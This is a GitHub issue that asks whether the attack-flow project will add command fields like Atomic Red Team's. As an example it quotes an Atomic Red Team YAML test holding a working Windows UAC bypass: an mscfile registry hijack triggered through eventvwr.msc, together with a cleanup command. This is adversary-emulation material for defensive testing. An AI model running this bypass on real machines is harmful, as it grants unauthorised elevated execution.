### ISSUE TITLE
Would attack-flow include attack action of an action?

### ISSUE THREAD

**Issue by imfht** [center-for-threat-informed-defense/attack-flow#45]
Hi:
    Noticed the [atomic-red-team](https://github.com/redcanaryco/atomic-red-team) has a command field for attack detail.
[eg](https://github.com/redcanaryco/atomic-red-team/raw/ef93c45591dffd2055411a6ef54ac91703db8381/atomics/T1548.002/T1548.002.yaml): 
```yaml
  input_arguments:
    executable_binary:
      description: Binary to execute with UAC Bypass
      type: Path
      default: C:\Windows\System32\cmd.exe
  executor:
    command: |
      reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
      cmd.exe /c eventvwr.msc
    cleanup_command: |
      reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
```
Looks like attack-flow do not have this fileds. It is hard to do a real test on a target machine.

It is a bug or a feature? 
Any help will be appreciated.
Thanks!
